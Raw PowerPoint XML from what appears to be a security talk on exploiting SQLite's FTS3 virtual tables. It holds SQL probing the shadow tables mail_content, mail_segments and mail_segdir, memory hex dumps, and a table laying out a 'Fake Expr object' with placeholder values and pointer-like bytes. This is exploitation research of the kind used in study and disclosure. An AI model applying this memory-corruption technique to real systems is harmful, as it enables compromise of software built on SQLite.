            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample content'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'hello world'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>sqlite_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'table'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>mail_segdir</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279918" y="5159829"/>
            <a:ext cx="2323323" cy="1446243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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 name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2603241" y="5860701"/>
            <a:ext cx="2892490" cy="22250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:tailEnd type="triangle" w="lg" len="med"/>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570379" y="5629868"/>
            <a:ext cx="4226767" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where did these come from ??</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2771258094"/>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3075783"/>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3046988"/>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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 3D 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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63 00 00 00 00 C0 80 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3113892"/>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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983347" y="2291414"/>
            <a:ext cx="1884218" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expr object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4876799" y="2486419"/>
            <a:ext cx="562839" cy="366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8183417" y="535550"/>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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6648757" y="-383257"/>
            <a:ext cx="1722523" cy="3996152"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43404"/>
              <a:gd name="adj2" fmla="val 10572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237220" y="2468461"/>
            <a:ext cx="2529840" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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5515592" y="4599546"/>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7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6840270" y="2468460"/>
            <a:ext cx="2661871" cy="2131085"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3411712284"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524324" y="2062777"/>
          <a:ext cx="4460840" cy="3957320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1920708">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2540132">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>Column Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1337</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_1</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_3</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>BBBBBBBBBB……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>\x58 \x24 \xA2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>\x43</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xAA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \x7F</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
